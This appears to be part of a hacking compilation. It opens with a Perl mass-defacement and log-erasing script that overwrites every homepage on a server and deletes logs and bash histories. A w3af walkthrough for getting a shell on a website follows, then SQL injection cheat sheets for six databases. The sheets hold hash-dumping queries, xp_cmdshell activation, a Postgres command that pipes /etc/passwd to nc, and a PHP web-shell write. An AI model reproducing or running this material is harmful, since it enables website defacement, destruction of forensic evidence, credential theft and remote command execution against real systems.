    "/var/log", "/var/logs", "/var/adm",
    "/var/apache/log", "/var/apache/logs",
    "/usr/local/apache/log", "/usr/local/apache/logs",
    "/root/.bash_history", "/root/.ksh_history",
);

if (!$ARGV[0]) {
    print "\033[01;37m!!Morocco.Security.Rulz mass defacer and log eraser !!\n";
    print "\033[01;37m!!!!!!!!!!!!!!!!!!coded by PRI[ll!!!!!!!!!!!!!!!!!!!!!!!!\n";
    print "\033[01;31m!!!!!!!!PRIV8!!!!!!!!PRIV8!!!!!!!!PRIV8!!!!!!!!PRIV8!!!!!!!!\033[01;37m\n";
    print "\033[01;37musage : perl $0 <path to your index>\n";
    print "\033[01;37mexample : perl $0 /tmp/index.html\n";
    exit;
}
if (!-e $index) {
    print "\033[01;31m[-] Failed ! the path to your index could not be found !\033[01;37m\n";
    exit;
}

print "\033[01;34mStarted MSRml V0.1 by PRI[ll Ok !!\033[01;37m\n";
print "\033[01;37mDefacing all homepages ...\n";
# Overwrite every index/main/home/default page on the box with the supplied file
system "find / -name \"index*\" -exec cp $index {} \\;";
system "find / -name \"main*\" -exec cp $index {} \\;";
system "find / -name \"home*\" -exec cp $index {} \\;";
system "find / -name \"default*\" -exec cp $index {} \\;";
print "\033[01;37m[+] done ! all sites in this box are defaced !\n";
print "\033[01;37m----------------------------------------------------------\n";
print "\033[01;37mCleaning up logs ...\n";
print "\033[01;34m---------erasing default log files (too fast =))---------\033[01;37m\n";
foreach my $log (@default_logs) {
    if (-e $log) {
        system "rm -rf $log";
        print "\033[01;37m [*]$log -erased Ok\n";
    } else {
        print "\033[01;31m[*]$log - No such file or directory\033[01;37m\n";
    }
}
print "\033[01;37m[+] -----done all default log and bash_history files erased !!\n";
print "\033[01;34m---------Now Erasing the rest of the machine log files (can be long :S)---------\033[01;37m\n";
system 'find / -name "*.bash_history" -exec rm -rf {} \;';
print "\033[01;37m[*] all *.bash_history files -erased Ok!\n";
system 'find / -name "*.bash_logout" -exec rm -rf {} \;';
print "\033[01;37m[*] all *.bash_logout files -erased Ok!\n";
system 'find / -name "log*" -exec rm -rf {} \;';
print "\033[01;37m[*] all log* files -erased Ok!\n";
system 'find / -name "*.log" -exec rm -rf {} \;';
print "\033[01;37m[*] all *.log files -erased Ok!\n";
print "\033[01;34m-------[+] !done all log files erased![+]-------\033[01;37m\n";
print "\033[01;34m---------------------------------------------------\033[01;37m\n";
print "\033[01;34m-----------------MSRml V 0.1----------------------\033[01;37m\n";
[/perl]

Getting a shell on a website with w3af
Hello everyone, you all know about Metasploit and use it to exploit targets. Good, good... but do
you know about w3af (Web Application Attack and Audit Framework)? It is an open-source project
started by Andrés Riancho, and for a while it was sponsored by Rapid7, the security firm behind
Metasploit. It is not as big as Metasploit, but it is more powerful than most other web testing
tools. OK, the introduction is over; we proceed to the practical part.

Requisites: Python and w3af

Step 1: Open the console (w3af_console) and set the target:
target
set target http://www.site.com/
back

Step 2: Now type:
plugins

Step 3: Now we'll look at the available plugins so we can enable them. Type:
help
(and then list audit to see the plugins in the "audit" category)

Step 4: Now we'll choose the plugin(s) from the "audit" category. Type:
audit "name of plugin"

You can choose multiple plugins in one shot like: audit <plugin1> <plugin2> <plugin3>.....

Step 5: If you saw any plugin with its config option marked as "YES", configure it with:
audit config <plugin>
(set the options it asks for, then type back)

Step 6: Now type:
back

Step 7: Choose another category if you want:
evasion, bruteforce or any other

Step 8: Now that our values are set, start the scan by typing:
start

Step 9: After the scan finishes, we exploit what it found. Type:
exploit

Step 10: Then type:
exploit osCommandingShell

Step 11: If everything goes right, we'll get a shell on the server; type:
interact 0 (zero)
Part - 3
- SQL Injection Cheat Sheet
  - Oracle SQL Injection Cheat Sheet
  - MSSQL Injection Cheat Sheet
  - MySQL SQL Injection Cheat Sheet
  - Postgres SQL Injection Cheat Sheet
  - Ingres SQL Injection Cheat Sheet
  - DB2 SQL Injection Cheat Sheet
  - Informix SQL Injection Cheat Sheet
- WordPress Hacking Tricks
- DNS Zone Transfer Vulnerability Exploit
- WHMCS Hacking with Submit Ticket exploit
- WHMCS Auto Exploiter
- Oracle Padding Attack Using Burp Suite
- HTTP NTLM Information Disclosure

SQL Injection Cheat Sheet
Oracle SQL Injection Cheat Sheet
Some useful syntax reminders for SQL Injection into Oracle databases...
This post is part of a series of SQL Injection Cheat Sheets. In this series, I've endeavoured to
tabulate the data to make it easier to read and to use the same table for each database
backend. This helps to highlight any features which are lacking for each database,
enumeration techniques that don't apply, and also areas that I haven't got round to researching
yet.
The complete list of SQL Injection Cheat Sheets I'm working on is:
- Oracle
- MSSQL
- MySQL
- PostgreSQL
- Ingres
- DB2
- Informix
I'm not planning to write one for MS Access, but there's a great MS Access Cheat Sheet here.
Some of the queries in the table below can only be run by an admin. These are marked with
"-- priv" at the end of the query.
Version
  SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';
  SELECT banner FROM v$version WHERE banner LIKE 'TNS%';
  SELECT version FROM v$instance;
Comments
  SELECT 1 FROM dual -- comment
  -- NB: SELECT statements must have a FROM clause in Oracle, so we have to use the dummy table
  -- name 'dual' when we're not actually selecting from a table.
Current User
  SELECT user FROM dual;
List Users
  SELECT username FROM all_users ORDER BY username;
  SELECT name FROM sys.user$; -- priv
List Password Hashes
  SELECT name, password, astatus FROM sys.user$; -- priv, <= 10g. astatus tells you if the account is locked
  SELECT name, spare4 FROM sys.user$; -- priv, 11g
Password Cracker
  checkpwd will crack the DES-based hashes from Oracle 8, 9 and 10.
List Privileges
  SELECT * FROM session_privs; -- current privs
  SELECT * FROM dba_sys_privs WHERE grantee = 'DBSNMP'; -- priv, list a user's privs
  SELECT grantee FROM dba_sys_privs WHERE privilege = 'SELECT ANY DICTIONARY'; -- priv, find users with a particular priv
  SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS;
List DBA Accounts
  SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = 'YES'; -- priv, list DBAs, DBA roles
Current Database
  SELECT global_name FROM global_name;
  SELECT name FROM v$database;
  SELECT instance_name FROM v$instance;
  SELECT SYS.DATABASE_NAME FROM DUAL;
List Databases
  SELECT DISTINCT owner FROM all_tables; -- list schemas (one per user)
  -- Also query the TNS listener for other databases. See tnscmd (services | status).
List Columns
  SELECT column_name FROM all_tab_columns WHERE table_name = 'blah';
  SELECT column_name FROM all_tab_columns WHERE table_name = 'blah' AND owner = 'foo';
List Tables
  SELECT table_name FROM all_tables;
  SELECT owner, table_name FROM all_tables;
Find Tables From Column Name
  SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%'; -- NB: table names are upper case
Select Nth Row
  SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r = 9; -- gets 9th row (rows numbered from 1)
Select Nth Char
  SELECT substr('abcd', 3, 1) FROM dual; -- gets 3rd character, 'c'
Bitwise AND
  SELECT bitand(6,2) FROM dual; -- returns 2
  SELECT bitand(6,1) FROM dual; -- returns 0
ASCII Value -> Char
  SELECT chr(65) FROM dual; -- returns A
Char -> ASCII Value
  SELECT ascii('A') FROM dual; -- returns 65
Casting
  SELECT CAST(1 AS char) FROM dual;
  SELECT CAST('1' AS int) FROM dual;
String Concatenation
  SELECT 'A' || 'B' FROM dual; -- returns AB
If Statement
  BEGIN IF 1=1 THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF; END; -- doesn't play well with SELECT statements
Case Statement
  SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END FROM dual; -- returns 1
  SELECT CASE WHEN 1=2 THEN 1 ELSE 2 END FROM dual; -- returns 2
Avoiding Quotes
  SELECT chr(65) || chr(66) FROM dual; -- returns AB
Time Delay
  BEGIN DBMS_LOCK.SLEEP(5); END; -- priv, can't seem to embed this in a SELECT
  SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual; -- if reverse lookups are slow
  SELECT UTL_INADDR.get_host_address('blah.attacker.com') FROM dual; -- if forward lookups are slow
  SELECT UTL_HTTP.REQUEST('http://google.com') FROM dual; -- if outbound TCP is filtered / slow
  -- Also see Heavy Queries to create a time delay
Make DNS Requests
  SELECT UTL_INADDR.get_host_address('google.com') FROM dual;
  SELECT UTL_HTTP.REQUEST('http://google.com') FROM dual;
Command Execution
  Java can be used to execute commands if it's installed. ExtProc can sometimes be used too,
  though it normally failed for me.
Local File Access
  UTL_FILE can sometimes be used. Check that the following is non-null:
  SELECT value FROM v$parameter2 WHERE name = 'utl_file_dir';
  Java can be used to read and write files if it's installed (it is not available in Oracle Express).
Hostname, IP Address
  SELECT UTL_INADDR.get_host_name FROM dual;
  SELECT host_name FROM v$instance;
  SELECT UTL_INADDR.get_host_address FROM dual; -- gets IP address
  SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual; -- gets hostnames
Location of DB files
  SELECT name FROM V$DATAFILE;
Default/System Databases
  SYSTEM
  SYSAUX
Misc Tips
In no particular order, here are some suggestions from pentestmonkey readers.
From Christian Mehlmauer:
Get all table names in one string
  SELECT rtrim(xmlagg(xmlelement(e, table_name || ',')).extract('//text()').extract('//text()'), ',') FROM all_tables; -- when using union-based SQLi with only one row
Blind SQLi in ORDER BY clause
  ORDER BY CASE WHEN ((SELECT 1 FROM user_tables WHERE substr(lower(table_name), 1, 1) = 'a' AND rownum = 1) = 1) THEN column_name1 ELSE column_name2 END -- you must know 2 column names with the same datatype

MSSQL Injection Cheat Sheet
Some useful syntax reminders for SQL Injection into MSSQL databases…

Some of the queries in the table below can only be run by an admin. These are marked with
"-- priv" at the end of the query.
Version
  SELECT @@version
Comments
  SELECT 1 -- comment
  SELECT /*comment*/1
Current User
  SELECT user_name();
  SELECT system_user;
  SELECT user;
  SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID
List Users
  SELECT name FROM master..syslogins
List Password Hashes
  SELECT name, password FROM master..sysxlogins -- priv, mssql 2000
  SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins -- priv, mssql 2000. Need to convert to hex to return hashes in an MSSQL error message / some versions of Query Analyzer.
  SELECT name, password_hash FROM master.sys.sql_logins -- priv, mssql 2005
  SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) FROM master.sys.sql_logins -- priv, mssql 2005
Password Cracker
  MSSQL 2000 and 2005 hashes are both SHA1-based. phrasen|drescher can crack these.
List Privileges
  -- current privs on a particular object in 2005, 2008
  SELECT permission_name FROM master..fn_my_permissions(null, 'DATABASE'); -- current database
  SELECT permission_name FROM master..fn_my_permissions(null, 'SERVER'); -- current server
  SELECT permission_name FROM master..fn_my_permissions('master..syslogins', 'OBJECT'); -- permissions on a table
  SELECT permission_name FROM master..fn_my_permissions('sa', 'USER'); -- permissions on a user
  -- current privs in 2005, 2008
  SELECT is_srvrolemember('sysadmin');
  SELECT is_srvrolemember('dbcreator');
  SELECT is_srvrolemember('bulkadmin');
  SELECT is_srvrolemember('diskadmin');
  SELECT is_srvrolemember('processadmin');
  SELECT is_srvrolemember('serveradmin');
  SELECT is_srvrolemember('setupadmin');
  SELECT is_srvrolemember('securityadmin');
  -- who has a particular priv? 2005, 2008
  SELECT name FROM master..syslogins WHERE denylogin = 0;
  SELECT name FROM master..syslogins WHERE hasaccess = 1;
  SELECT name FROM master..syslogins WHERE isntname = 0;
  SELECT name FROM master..syslogins WHERE isntgroup = 0;
  SELECT name FROM master..syslogins WHERE sysadmin = 1;
  SELECT name FROM master..syslogins WHERE securityadmin = 1;
  SELECT name FROM master..syslogins WHERE serveradmin = 1;
  SELECT name FROM master..syslogins WHERE setupadmin = 1;
  SELECT name FROM master..syslogins WHERE processadmin = 1;
  SELECT name FROM master..syslogins WHERE diskadmin = 1;
  SELECT name FROM master..syslogins WHERE dbcreator = 1;
  SELECT name FROM master..syslogins WHERE bulkadmin = 1;
List DBA Accounts
  SELECT is_srvrolemember('sysadmin'); -- is your account a sysadmin? returns 1 for true, 0 for false, NULL for invalid role. Also try 'bulkadmin', 'serveradmin' and the other fixed server roles from the documentation
  SELECT is_srvrolemember('sysadmin', 'sa'); -- is sa a sysadmin? returns 1 for true, 0 for false, NULL for invalid role/username.
  SELECT name FROM master..syslogins WHERE sysadmin = '1' -- tested on 2005
Current Database
  SELECT DB_NAME()
List Databases
  SELECT name FROM master..sysdatabases;
  SELECT DB_NAME(N); -- for N = 0, 1, 2, ...
List Columns
  SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'mytable'); -- for the current DB only
  SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id = master..sysobjects.id AND master..sysobjects.name = 'sometable'; -- list column names and types for master..sometable
List Tables
  SELECT name FROM master..sysobjects WHERE xtype = 'U'; -- use xtype = 'V' for views
  SELECT name FROM someotherdb..sysobjects WHERE xtype = 'U';
  SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id = master..sysobjects.id AND master..sysobjects.name = 'sometable'; -- list column names and types for master..sometable
Find Tables From Column Name
  -- NB: This example works only for the current database. If you want to search another db, you
  -- need to specify the db name (e.g. replace sysobjects with mydb..sysobjects).
  SELECT sysobjects.name AS tablename, syscolumns.name AS columnname FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = 'U' AND syscolumns.name LIKE '%PASSWORD%' -- this lists table, column for each column containing the word 'password'
Select Nth Row
  SELECT TOP 1 name FROM (SELECT TOP 9 name FROM master..syslogins ORDER BY name ASC) sq ORDER BY name DESC -- gets 9th row
Select Nth Char
  SELECT substring('abcd', 3, 1) -- returns c
Bitwise AND
  SELECT 6 & 2 -- returns 2
  SELECT 6 & 1 -- returns 0
ASCII Value -> Char
  SELECT char(0x41) -- returns A
Char -> ASCII Value
  SELECT ascii('A') -- returns 65
Casting
  SELECT CAST('1' AS int);
  SELECT CAST(1 AS char)
String Concatenation
  SELECT 'A' + 'B' -- returns AB
If Statement
  IF (1=1) SELECT 1 ELSE SELECT 2 -- returns 1
Case Statement
  SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END -- returns 1
Avoiding Quotes
  SELECT char(65)+char(66) -- returns AB
Time Delay
  WAITFOR DELAY '0:0:5' -- pause for 5 seconds
Make DNS Requests
  declare @host varchar(800); select @host = name FROM master..syslogins; exec('master..xp_getfiledetails ''\\' + @host + '\c$\boot.ini'''); -- nonpriv, works on 2000
  declare @host varchar(800); select @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) + '.2.pentestmonkey.net' from sys.sql_logins; exec('xp_fileexist ''\\' + @host + '\c$\boot.ini'''); -- priv, works on 2005
  -- NB: Concatenation is not allowed in calls to these SPs, hence why we have to use @host. Messy but necessary.
  -- Also check out the DNS tunnel feature of sqlninja
Command Execution
  EXEC xp_cmdshell 'net user'; -- priv
  On MSSQL 2005 you may need to reactivate xp_cmdshell first as it's disabled by default:
  EXEC sp_configure 'show advanced options', 1; -- priv
  RECONFIGURE; -- priv
  EXEC sp_configure 'xp_cmdshell', 1; -- priv
  RECONFIGURE; -- priv
Local File Access
  CREATE TABLE mydata (line varchar(8000));
  BULK INSERT mydata FROM 'c:\boot.ini';
  DROP TABLE mydata;
Hostname, IP Address
  SELECT HOST_NAME()
Create Users
  EXEC sp_addlogin 'user', 'pass'; -- priv
Drop Users
  EXEC sp_droplogin 'user'; -- priv
Make User DBA
  EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin'; -- priv
Location of DB files
  EXEC sp_helpdb master; -- location of master.mdf
  EXEC sp_helpdb pubs; -- location of pubs.mdf
Default/System Databases
  northwind
  model
  msdb
  pubs -- not on sql server 2005
  tempdb
Misc Tips
In no particular order, here are some suggestions from pentestmonkey readers.
From Dan Crowley:
A way to extract data via SQLi with a MySQL backend
From Jeremy Bae:
Tip about sp_helpdb - included in table above.
From Trip:
List DBAs (included in table above now):
  select name from master..syslogins where sysadmin = '1'
From Daniele Costa:
Tips on using fn_my_permissions in 2005, 2008 - included in table above.
Also:
To check permissions on multiple databases you will have to use the following pattern.
  USE [DBNAME]; select permission_name FROM fn_my_permissions (NULL, 'DATABASE')
Note also that in case of using this data with a UNION query a collation error could occur.
In this case a simple trick is to use the following syntax:
  select permission_name collate database_default FROM fn_my_permissions (NULL, 'DATABASE')

MySQL SQL Injection Cheat Sheet
Some useful syntax reminders for SQL Injection into MySQL databases…
This post is part of a series of SQL Injection Cheat Sheets. In this series, I've endeavoured to
tabulate the data to make it easier to read and to use the same table for each database
backend. This helps to highlight any features which are lacking for each database,
enumeration techniques that don't apply, and also areas that I haven't got round to researching
yet.
The complete list of SQL Injection Cheat Sheets I'm working on is:
- Oracle
- MSSQL
- MySQL
- PostgreSQL
- Ingres
- DB2
- Informix
I'm not planning to write one for MS Access, but there's a great MS Access Cheat Sheet here.
Some of the queries in the table below can only be run by an admin. These are marked with "--
priv" at the end of the query.
Version SELECT @@version
Comments
SELECT 1; #comment
SELECT /*comment*/1;
Current User
SELECT user();
SELECT system_user();
List Users SELECT user FROM mysql.user; -- priv
List Password Hashes SELECT host, user, password FROM mysql.user; -- priv
Password Cracker John the Ripper will crack MySQL password hashes.
List Privileges
SELECT grantee, privilege_type, is_grantable FROM
information_schema.user_privileges; -- list user privs
SELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv,
Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv,
Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv,
Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user; -- priv, list user privs
SELECT grantee, table_schema, privilege_type FROM
information_schema.schema_privileges; -- list privs on databases (schemas)
SELECT table_schema, table_name, column_name, privilege_type FROM
information_schema.column_privileges; -- list privs on columns
List DBA Accounts
SELECT grantee, privilege_type, is_grantable FROM
information_schema.user_privileges WHERE privilege_type = 'SUPER';
SELECT host, user FROM mysql.user WHERE Super_priv = 'Y'; # priv
Current Database SELECT database()
List Databases
SELECT schema_name FROM information_schema.schemata; -- for MySQL >= v5.0
SELECT distinct(db) FROM mysql.db -- priv
List Columns
SELECT table_schema, table_name, column_name FROM
information_schema.columns WHERE table_schema != 'mysql' AND table_schema !=
'information_schema'
List Tables
SELECT table_schema,table_name FROM information_schema.tables WHERE
table_schema != 'mysql' AND table_schema != 'information_schema'
Find Tables From Column Name
SELECT table_schema, table_name FROM information_schema.columns WHERE
column_name = 'username'; -- find tables which have a column called 'username'
Select Nth Row
SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 0; # rows numbered from 0
SELECT host,user FROM user ORDER BY host LIMIT 1 OFFSET 1; # rows numbered from 0
Select Nth Char SELECT substr('abcd', 3, 1); # returns c
Bitwise AND
SELECT 6 & 2; # returns 2
SELECT 6 & 1; # returns 0
ASCII Value -> Char SELECT char(65); # returns A
Char -> ASCII Value SELECT ascii('A'); # returns 65
Casting
SELECT cast('1' AS unsigned integer);
SELECT cast('123' AS char);
String Concatenation
SELECT CONCAT('A','B'); # returns AB
SELECT CONCAT('A','B','C'); # returns ABC
If Statement SELECT if(1=1,'foo','bar'); -- returns 'foo'
Case Statement SELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END; # returns A
Avoiding Quotes SELECT 0x414243; # returns ABC
Time Delay
SELECT BENCHMARK(1000000,MD5('A'));
SELECT SLEEP(5); # >= 5.0.12
Make DNS Requests Impossible?
Command Execution
If mysqld (<5.0) is running as root AND you compromise a DBA account you can
execute OS commands by uploading a shared object file into /usr/lib (or similar). The
.so file should contain a User Defined Function (UDF). raptor_udf.c explains exactly
how you go about this. Remember to compile for the target architecture which may
or may not be the same as your attack platform.
Local File Access
...' UNION ALL SELECT LOAD_FILE('/etc/passwd') -- priv, can only read world-readable files.
SELECT * FROM mytable INTO dumpfile '/tmp/somefile'; -- priv, write to file system
Hostname, IP Address SELECT @@hostname;
Create Users CREATE USER test1 IDENTIFIED BY 'pass1'; -- priv
Delete Users DROP USER test1; -- priv
Make User DBA GRANT ALL PRIVILEGES ON *.* TO test1@'%'; -- priv
Location of DB files SELECT @@datadir;
Default/System Databases
information_schema (>= mysql 5.0)
mysql

Postgres SQL Injection Cheat Sheet
Some useful syntax reminders for SQL Injection into PostgreSQL databases…
Some of the queries in the table below can only be run by an admin. These are marked with "--
priv" at the end of the query.
Version SELECT version()
Comments
SELECT 1; --comment
SELECT /*comment*/1;
Current User
SELECT user;
SELECT current_user;
SELECT session_user;
SELECT usename FROM pg_user;
SELECT getpgusername();
List Users SELECT usename FROM pg_user
List Password Hashes SELECT usename, passwd FROM pg_shadow -- priv
Password Cracker MDCrack can crack PostgreSQL's MD5-based passwords.
List Privileges SELECT usename, usecreatedb, usesuper, usecatupd FROM pg_user
List DBA Accounts SELECT usename FROM pg_user WHERE usesuper IS TRUE
Current Database SELECT current_database()
List Databases SELECT datname FROM pg_database
List Columns
SELECT relname, A.attname FROM pg_class C, pg_namespace N, pg_attribute A,
pg_type T WHERE (C.relkind='r') AND (N.oid=C.relnamespace) AND (A.attrelid=C.oid)
AND (A.atttypid=T.oid) AND (A.attnum>0) AND (NOT A.attisdropped) AND
(N.nspname ILIKE 'public')
List Tables
SELECT c.relname FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n
ON n.oid = c.relnamespace WHERE c.relkind IN ('r','') AND n.nspname NOT IN
('pg_catalog', 'pg_toast') AND pg_catalog.pg_table_is_visible(c.oid)
Find Tables From Column Name
If you want to list all the table names that contain a column LIKE '%password%':
SELECT DISTINCT relname FROM pg_class C, pg_namespace N,
pg_attribute A, pg_type T WHERE (C.relkind='r') AND (N.oid=C.relnamespace) AND
(A.attrelid=C.oid) AND (A.atttypid=T.oid) AND (A.attnum>0) AND (NOT
A.attisdropped) AND (N.nspname ILIKE 'public') AND attname LIKE '%password%';
Select Nth Row
SELECT usename FROM pg_user ORDER BY usename LIMIT 1 OFFSET 0; -- rows numbered from 0
SELECT usename FROM pg_user ORDER BY usename LIMIT 1 OFFSET 1;
Select Nth Char SELECT substr('abcd', 3, 1); -- returns c
Bitwise AND
SELECT 6 & 2; -- returns 2
SELECT 6 & 1; -- returns 0
ASCII Value -> Char SELECT chr(65);
Char -> ASCII Value SELECT ascii('A');
Casting
SELECT CAST(1 as varchar);
SELECT CAST('1' as int);
String Concatenation SELECT 'A' || 'B'; -- returns AB
If Statement
IF statements only seem valid inside functions, so aren't much use for SQL injection.
See CASE statement instead.
Case Statement SELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END; -- returns A
Avoiding Quotes SELECT CHR(65)||CHR(66); -- returns AB
Time Delay
SELECT pg_sleep(10); -- postgres 8.2+ only
CREATE OR REPLACE FUNCTION sleep(int) RETURNS int AS '/lib/libc.so.6', 'sleep'
language 'C' STRICT; SELECT sleep(10); -- priv, create your own sleep function. Taken
from here.
Make DNS Requests
Generally not possible in postgres. However if contrib/dblink is installed (it isn't by
default) it can be used to resolve hostnames (assuming you have DBA rights):
SELECT * FROM dblink('host=put.your.hostname.here user=someuser
dbname=somedb', 'SELECT version()') AS t(result TEXT);
Alternatively, if you have DBA rights you could run an OS-level command (see
below) to resolve hostnames, e.g. "ping pentestmonkey.net".
Command Execution
CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6',
'system' LANGUAGE 'C' STRICT; -- priv
SELECT system('cat /etc/passwd | nc 10.0.0.1 8080'); -- priv, commands run as postgres/pgsql OS-level user
Local File Access
CREATE TABLE mydata(t text);
COPY mydata FROM '/etc/passwd'; -- priv, can read files which are readable by
postgres OS-level user
...' UNION ALL SELECT t FROM mydata LIMIT 1 OFFSET 1; -- get data back one row at a time
...' UNION ALL SELECT t FROM mydata LIMIT 1 OFFSET 2; -- get data back one row at a time ...
DROP TABLE mydata;
Write to a file:
CREATE TABLE mytable (mycol text);
INSERT INTO mytable(mycol) VALUES ('<? passthru($_GET[cmd]); ?>');
COPY mytable (mycol) TO '/tmp/test.php'; -- priv, write files as postgres OS-level
user. Generally you won't be able to write to the web root, but it's always worth a try.
-- priv user can also read/write files by mapping libc functions
Hostname, IP Address
SELECT inet_server_addr(); -- returns db server IP address (or null if using local connection)
SELECT inet_server_port(); -- returns db server port (or null if using local connection)
Create Users
CREATE USER test1 PASSWORD 'pass1'; -- priv
CREATE USER test1 PASSWORD 'pass1' CREATEUSER; -- priv, grant some privs at the same time
Drop Users DROP USER test1; -- priv
Make User DBA ALTER USER test1 CREATEUSER CREATEDB; -- priv
Location of DB files
SELECT current_setting('data_directory'); -- priv
SELECT current_setting('hba_file'); -- priv
Default/System Databases
template0
template1

Ingres SQL Injection Cheat Sheet
Ingres seems to be one of the less common database backends for web applications, so I thought
it would be worth installing it and making some notes to make my next Ingres-based web app
test a little easier.
Below are some tabulated notes on how to do many of the things you'd normally do via SQL
injection. All tests were performed on Ingres 9.2.0 alpha Build 108 for Linux. The Ingres
download page is here.
This page will probably remain a work-in-progress for some time yet. I’ll update it as I learn
more.
Version select dbmsinfo('_version');
Comments
SELECT 123; -- comment
select 123; /* comment */
Current User
select dbmsinfo('session_user');
select dbmsinfo('system_user');
List Users
First connect to iidbdb, then:
SELECT name, password FROM iiuser; -- or
SELECT own FROM iidatabase;
Create Users create user testuser with password = 'testuser'; -- priv
List Password Hashes
First connect to iidbdb, then:
select name, password from iiuser;
List Privileges
select dbmsinfo('db_admin');
select dbmsinfo('create_table');
select dbmsinfo('create_procedure');
select dbmsinfo('security_priv');
select dbmsinfo('select_syscat');
select dbmsinfo('db_privileges');
select dbmsinfo('current_priv_mask');
List DBA Accounts TODO
Current Database select dbmsinfo('database');
List Databases SELECT name FROM iidatabase; -- connect to iidbdb
List Columns
select column_name, column_datatype, table_name, table_owner from iicolumns;
List Tables
select table_name, table_owner from iitables;
select relid, relowner, relloc from iirelation;
select relid, relowner, relloc from iirelation where relowner != '$ingres';
Find Tables From Column Name
SELECT table_name, table_owner FROM iicolumns WHERE column_name = 'value'
Select Nth Row
Astoundingly, this doesn't seem to be possible! This is as close as you can get:
select top 10 blah from table;
select first 10 blah from table;
Select Nth Char select substr('abc', 2, 1); -- returns 'b'
Bitwise AND
The function "bit_and" exists, but seems hard to use. Here's an
example of ANDing 3 and 5 together. The result is a "byte" type with value 1:
select substr(bit_and(cast(3 as byte), cast(5 as byte)),1,1);
ASCII Value -> Char TODO
Char -> ASCII Value TODO
(The "ascii" function exists, but doesn't seem to do what I'd expect.)
Casting
select cast(123 as varchar);
select cast('123' as integer);
String Concatenation select 'abc' || 'def';
If Statement TODO
Case Statement TODO
Avoiding Quotes TODO
Time Delay ??? See Heavy Queries article for some ideas.
Make DNS Requests TODO
Command Execution Impossible?
Local File Access TODO
Hostname, IP Address SELECT dbmsinfo('ima_server')
Location of DB files
SELECT dbdev, ckpdev, jnldev, sortdev FROM iidatabase WHERE name = 'value'
-- primary location of db
SELECT lname FROM iiextend WHERE dname = 'value' -- extended location of db
SELECT area FROM iilocations where lname = 'value' -- all areas (ie directories) linked
with a location
Default/System Databases
SELECT name FROM iidatabase WHERE own = '$ingres' -- connect to iidbdb
Installing Locally
The Ingres database can be downloaded for free from http://esd.ingres.com/
A pre-built Linux-based Ingres Database Server can be downloaded from
http://www.vmware.com/appliances/directory/832
Database Client
TODO
There is a client called "sql" which can be used for local connections (at least) in
the database server package above.
Logging in from command line
$ su - ingres
$ sql iidbdb
* select dbmsinfo('_version'); \g
Identifying on the network
TODO
The following areas are interesting enough to include on this page, but I haven't researched them
for other databases:
Description SQL / Comments
Batching Queries Allowed?
Not via DBI in PERL. Subsequent statements seem to get ignored:
select blah from table where foo = 1; select ... doesn't matter, this is ignored.
FROM clause mandated in SELECTs?
No. You don't need to select from "dual" or anything. The following is legal:
select 1;
UNION supported
Yes. Nothing tricky here. The following is legal:
select 1 union select 2;
Enumerate Tables Privs select table_name, permit_user, permit_type from iiaccess;
Length of a string select length('abc'); -- returns 3
Roles and passwords
First you need to connect to iidbdb, then:
select roleid, rolepass from iirole;
List Database Procedures
First you need to connect to iidbdb, then:
select dbp_name, dbp_owner from iiprocedure;
Create Users + Granting Privs
First you need to connect to iidbdb, then:
create user pm with password = 'password';
grant all on current installation to pm;

DB2 SQL Injection Cheat Sheet
Finding a SQL injection vulnerability in a web application backed by DB2 isn’t too common in
my experience. When you do find one, though it pays to be prepared…
Below are some tabulated notes on how to do many of the things you'd normally do via SQL
injection. All tests were performed on DB2 8.2 under Windows.
Some of the queries in the table below can only be run by an admin. These are marked with "--
priv" at the end of the query.
Version select versionnumber, version_timestamp from sysibm.sysversions;
Comments select blah from foo; -- comment like this
Current User
select user from sysibm.sysdummy1;
select session_user from sysibm.sysdummy1;
select system_user from sysibm.sysdummy1;
List Users
N/A (I think DB2 uses OS-level user accounts for authentication.)
Database authorities (like roles, I think) can be listed like this:
select grantee from syscat.dbauth;
List Password Hashes N/A (I think DB2 uses OS-level user accounts for authentication.)
List Privileges
select * from syscat.tabauth; -- privs on tables
select * from syscat.dbauth where grantee = current user;
select * from syscat.tabauth where grantee = current user;
select * from SYSIBM.SYSUSERAUTH -- list db2 system privileges
List DBA Accounts
select name from SYSIBM.SYSUSERAUTH where SYSADMAUTH = 'Y' or SYSADMAUTH = 'G'
Current Database select current server from sysibm.sysdummy1;
List Databases SELECT schemaname FROM syscat.schemata;
List Columns select name, tbname, coltype from sysibm.syscolumns;
List Tables select name from sysibm.systables;
Find Tables From Column Name select tbname from sysibm.syscolumns where name='username'
Select Nth Row
select name from (SELECT name FROM sysibm.systables order by
name fetch first N+M-1 rows only) sq order by name desc fetch first N rows only;
Select Nth Char SELECT SUBSTR('abc',2,1) FROM sysibm.sysdummy1; -- returns b
